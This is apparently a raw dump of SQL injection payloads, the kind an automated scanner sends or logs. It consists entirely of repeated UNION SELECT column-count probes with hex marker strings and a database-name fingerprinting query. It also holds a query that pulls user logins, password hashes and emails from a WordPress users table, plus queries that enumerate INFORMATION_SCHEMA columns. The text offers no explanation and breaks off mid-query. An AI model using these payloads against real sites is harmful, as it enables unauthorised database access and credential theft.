0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536-- -999.9 UNION ALL SELECT 0x31303235343830303536-- -999.9 UNION ALL SELECT concat(0x7e,0x27,0x7233646D3076335F73716C5F696E6A656374696F6E,0x27,0x7e)-- -999.9 UNION ALL SELECT concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)-- -99999 union select 1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7 from wp_users/* 0 UNION SELECT 0x73716C696E6A666C6431 LIMIT 1,1-- 0 UNION SELECT 0x73716C696E6A666C6431 LIMIT 1,1/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432 LIMIT 1,1-- 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432 LIMIT 1,1/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433 LIMIT 1,1/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130,0x73716C696E6A666C643131,0x73716C696E6A666C643132,0x73716C696E6A666C643133,0x73716C696E6A666C643134,0x73716C696E6A666C643135,0x73716C696E6A666C643136,0x73716C696E6A666C643137,0x73716C696E6A666C643138,0x73716C696E6A666C643139,0x73716C696E6A666C643230/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130,0x73716C696E6A666C643131,0x73716C696E6A666C643132,0x73716C696E6A666C643133,0x73716C696E6A666C643134,0x73716C696E6A666C643135,0x73716C696E6A666C643136,0x73716C696E6A666C643137,0x73716C696E6A666C643138,0x73716C696E6A666C643139/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130,0x73716C696E6A666C643131,0x73716C696E6A666C643132,0x73716C696E6A666C643133,0x73716C696E6A666C643134,0x73716C696E6A666C643135,0x73716C696E6A666C643136,0x73716C696E6A666C643137,0x73716C696E6A666C643138/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130,0x73716C696E6A666C643131,0x73716C696E6A666C643132,0x73716C696E6A666C643133,0x73716C696E6A666C643134,0x73716C696E6A666C643135,0x73716C696E6A666C643136,0x73716C696E6A666C643137/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130,0x73716C696E6A666C643131,0x73716C696E6A666C643132,0x73716C696E6A666C643133,0x73716C696E6A666C643134,0x73716C696E6A666C643135,0x73716C696E6A666C643136/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130,0x73716C696E6A666C643131,0x73716C696E6A666C643132,0x73716C696E6A666C643133,0x73716C696E6A666C643134,0x73716C696E6A666C643135/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130,0x73716C696E6A666C643131,0x73716C696E6A666C643132,0x73716C696E6A666C643133,0x73716C696E6A666C643134/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130,0x73716C696E6A666C643131,0x73716C696E6A666C643132,0x73716C696E6A666C643133/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130,0x73716C696E6A666C643131,0x73716C696E6A666C643132/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130,0x73716C696E6A666C643131/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432/*{SQLINJ} 0 UNION SELECT 0x73716C696E6A666C6431-- 0 UNION SELECT 0x73716C696E6A666C6431/*{SQLINJ} 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 1,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 10,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 11,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 12,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 13,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 14,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 15,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 16,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 2,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 3,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 4,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 5,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 6,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 7,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 8,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x42414E5F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 9,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x4348415241435445525F53455453 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 1,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x4348415241435445525F53455453 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 2,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x4348415241435445525F53455453 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 3,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x4348415241435445525F53455453 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 4,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x434C49454E545F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 1,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x434C49454E545F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 10,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x434C49454E545F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 11,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x434C49454E545F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 12,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x434C49454E545F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 13,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x434C49454E545F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 14,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x434C49454E545F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 15,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x434C49454E545F53544154495354494353 AND TABLE_SCHEMA=0x696E666F726D6174696F6E5F736368656D61 LIMIT 16,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x434C49454E545F53544154495354494353 AND 